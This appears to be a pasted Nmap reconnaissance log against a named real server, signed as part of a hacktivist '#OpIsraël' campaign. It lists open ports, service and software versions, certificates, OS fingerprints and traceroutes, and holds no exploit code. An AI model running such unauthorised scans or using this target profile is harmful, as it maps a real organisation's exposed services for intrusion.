- | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/localityName=Sometown/emailAddress=webaster@localhost/organizationalUnitName=none
- | Public Key type: rsa
- | Public Key bits: 1024
- | Signature Algorithm: sha1WithRSAEncryption
- | Not valid before: 2014-07-29T06:26:14
- | Not valid after: 2041-12-13T06:26:14
- | MD5: 4b29 2c8a 525a d420 e4f7 78c1 45d2 4ed9
- | SHA-1: cc0a 349f 83d9 4d41 d316 0e7a a751 ce8d 5322 7241
- | -----BEGIN CERTIFICATE-----
- | MIICkTCCAfoCCQD3JF1s3Ui7BzANBgkqhkiG9w0BAQUFADCBjDELMAkGA1UEBhMC
- | R0IxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
- | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEh
- | MB8GCSqGSIb3DQEJARYSd2ViYXN0ZXJAbG9jYWxob3N0MB4XDTE0MDcyOTA2MjYx
- | NFoXDTQxMTIxMzA2MjYxNFowgYwxCzAJBgNVBAYTAkdCMRUwEwYDVQQIEwxTb21l
- | cHJvdmluY2UxETAPBgNVBAcTCFNvbWV0b3duMQ0wCwYDVQQKEwRub25lMQ0wCwYD
- | VQQLEwRub25lMRIwEAYDVQQDEwlsb2NhbGhvc3QxITAfBgkqhkiG9w0BCQEWEndl
- | YmFzdGVyQGxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA5Euc
- | SYOuqLn4h5hktsteODz8pR6VsFNktHT+tgSHoEPeJ/2S1efAY/zoMRhwXo9k9RVc
- | S11EDYVjzGrQeni2/o0rFC3kCJI37P4AHbaQg7BJlyqVW9BHQaHW++gknGH8L2XF
- | DC97iiawhWQIEF06Hg8319FHZZBdTEi3w5A0R10CAwEAATANBgkqhkiG9w0BAQUF
- | AAOBgQBT5tKhGxu0mGTfi9dP8q21FSzhyR9G5n7uGL/+3Bl7Six7w9l+4HOy3zMl
- | VvJTXWh+FGInAytzBf4BzC3D84qo13B8w13tivpdNf1o1WV65fgBZZTmak/KCbZf
- | 9BHpO92XZPxlmPCEPoMmyXN0dVM8jZmbI6LvFZZS1EBIPx9fng==
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- 587/tcp open smtp syn-ack Exim smtpd 4.91
- |_smtp-commands: SMTP: EHLO 550 Bad HELO - Host impersonating hostname [server.webid.co.il]\x0D
- 993/tcp open ssl/imaps? syn-ack
- |_ssl-date: TLS randomness does not represent time
- 995/tcp open ssl/pop3s? syn-ack
- |_ssl-date: TLS randomness does not represent time
- 2000/tcp open tcpwrapped syn-ack
- 2222/tcp open http syn-ack DirectAdmin httpd 1.53.0 (Registered to webid.co.il)
- |_http-favicon: Unknown favicon MD5: F0CC6DDDAE553AA7CFEB2CA5B62B2083
- | http-methods:
- |_ Supported Methods: GET HEAD POST
- |_http-server-header: DirectAdmin Daemon v1.53.0 Registered to webid.co.il
- |_http-title: DirectAdmin Login
- |_http-trane-info: Problem with XML parsing of /evox/about
- 3306/tcp open mysql syn-ack MySQL 5.5.60-MariaDB
- | mysql-info:
- | Protocol: 10
- | Version: 5.5.60-MariaDB
- | Thread ID: 11690366
- | Capabilities flags: 63487
- | Some Capabilities: Support41Auth, SupportsLoadDataLocal, LongPassword, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, ODBCClient, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, FoundRows, InteractiveClient, LongColumnFlag, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, SupportsCompression, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
- | Status: Autocommit
- | Salt: >|w^Tf(/U?ygxE-S8^R_
- |_ Auth Plugin Name: mysql_native_password
- 5060/tcp open tcpwrapped syn-ack
- 8080/tcp open ssl/http-proxy syn-ack Apache/2
- | http-methods:
- |_ Supported Methods: GET POST OPTIONS HEAD
- |_http-open-proxy: Proxy might be redirecting requests
- |_http-server-header: Apache/2
- |_http-title: Site doesn't have a title (text/html).
- 8081/tcp open ssl/ssl syn-ack Apache httpd (SSL-only mode)
- | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
- | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha1WithRSAEncryption
- | Not valid before: 2014-09-20T10:18:07
- | Not valid after: 2042-02-04T10:18:07
- | MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
- | SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
- | -----BEGIN CERTIFICATE-----
- | MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
- | VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
- | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
- | MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
- | MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
- | ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
- | A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
- | ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
- | AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
- | bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
- | WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
- | CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
- | 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
- | 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
- | b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
- | 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
- | 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
- | WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
- | hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
- | Mkh66D1gfgB2ubts
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- | tls-alpn:
- |_ http/1.1
- OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
- Aggressive OS guesses: Linux 2.6.32 (93%), Linux 3.4 (93%), Synology DiskStation Manager 5.1 (92%), Linux 3.10 (92%), Linux 2.6.32 or 3.10 (92%), Linux 2.6.39 (92%), WatchGuard Fireware 11.8 (92%), Linux 3.1 - 3.2 (92%), Linux 2.6.32 - 2.6.39 (90%), Linux 3.2 - 3.8 (88%)
- No exact OS matches for host (test conditions non-ideal).
- TCP/IP fingerprint:
- SCAN(V=7.70SVN%E=4%D=1/23%OT=21%CT=1%CU=%PV=N%DS=17%DC=T%G=N%TM=5C483C37%P=x86_64-unknown-linux-gnu)
- SEQ(SP=10A%GCD=1%ISR=10C%TI=Z%II=I%TS=A)
- SEQ(SP=10A%GCD=1%ISR=10C%TI=Z%TS=A)
- OPS(O1=M4B3ST11NW7%O2=M4B3ST11NW7%O3=M4B3NNT11NW7%O4=M4B3ST11NW7%O5=M4B3ST11NW7%O6=M4B3ST11)
- WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)
- ECN(R=Y%DF=Y%TG=40%W=3908%O=M4B3NNSNW7%CC=Y%Q=)
- T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
- T2(R=N)
- T3(R=N)
- T4(R=N)
- T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
- T6(R=N)
- T7(R=N)
- U1(R=N)
- IE(R=Y%DFI=N%TG=40%CD=S)
- Uptime guess: 25.499 days (since Fri Dec 28 17:06:06 2018)
- Network Distance: 17 hops
- TCP Sequence Prediction: Difficulty=266 (Good luck!)
- IP ID Sequence Generation: All zeros
- Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 143.99 ms 10.246.200.1
- 2 144.80 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
- 3 144.04 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
- 4 144.07 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 178.25 ms 62.115.119.76
- 6 177.09 ms 62.115.133.79
- 7 184.94 ms ffm-b1-link.telia.net (62.115.116.158)
- 8 177.14 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
- 9 ...
- 10 230.24 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
- 11 230.92 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
- 12 231.85 ms 212.143.7.247
- 13 231.86 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
- 14 233.87 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
- 15 236.39 ms 82.166.37.254
- 16 237.16 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 17 236.33 ms server.webid.co.il (62.90.134.182)
- NSE: Script Post-scanning.
- NSE: Starting runlevel 1 (of 3) scan.
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- NSE: Starting runlevel 2 (of 3) scan.
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- NSE: Starting runlevel 3 (of 3) scan.
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- Read data files from: /usr/local/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 302.87 seconds
- Raw packets sent: 101 (7.894KB) | Rcvd: 1371 (577.453KB)
- ######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:04 EST
- NSE: Loaded 149 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 05:04
- Completed Parallel DNS resolution of 1 host. at 05:04, 0.02s elapsed
- Initiating UDP Scan at 05:04
- Scanning server.webid.co.il (62.90.134.182) [13 ports]
- Discovered open port 53/udp on 62.90.134.182
- Completed UDP Scan at 05:04, 5.77s elapsed (13 total ports)
- Initiating Service scan at 05:04
- Scanning 1 service on server.webid.co.il (62.90.134.182)
- Completed Service scan at 05:04, 0.34s elapsed (1 service on 1 host)
- Initiating OS detection (try #1) against server.webid.co.il (62.90.134.182)
- Retrying OS detection (try #2) against server.webid.co.il (62.90.134.182)
- Initiating Traceroute at 05:04
- Completed Traceroute at 05:04, 7.20s elapsed
- Initiating Parallel DNS resolution of 1 host. at 05:04
- Completed Parallel DNS resolution of 1 host. at 05:04, 0.02s elapsed
- NSE: Script scanning 62.90.134.182.
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.69s elapsed
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- Nmap scan report for server.webid.co.il (62.90.134.182)
- Host is up (0.32s latency).
- PORT STATE SERVICE VERSION
- 53/udp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
- | dns-nsid:
- |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
- 67/udp closed dhcps
- 68/udp closed dhcpc
- 69/udp closed tftp
- 88/udp closed kerberos-sec
- 123/udp closed ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp closed netbios-ssn
- 162/udp closed snmptrap
- 389/udp closed ldap
- 520/udp closed route
- 2049/udp closed nfs
- Too many fingerprints match this host to give specific OS details
- Network Distance: 16 hops
- Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- TRACEROUTE (using port 137/udp)
- HOP RTT ADDRESS
- 1 ... 6
- 7 144.45 ms 10.246.200.1
- 8 ... 9
- 10 142.52 ms 10.246.200.1
- 11 146.42 ms 10.246.200.1
- 12 146.40 ms 10.246.200.1
- 13 146.39 ms 10.246.200.1
- 14 146.39 ms 10.246.200.1
- 15 146.38 ms 10.246.200.1
- 16 146.39 ms 10.246.200.1
- 17 ... 18
- 19 144.29 ms 10.246.200.1
- 20 144.57 ms 10.246.200.1
- 21 144.71 ms 10.246.200.1
- 22 ... 29
- 30 142.65 ms 10.246.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- Read data files from: /usr/local/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 19.93 seconds
- Raw packets sent: 124 (9.536KB) | Rcvd: 2124 (547.988KB)
- #######################################################################################################################################
- Anonymous JTSEC #OpIsraël Full Recon #3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement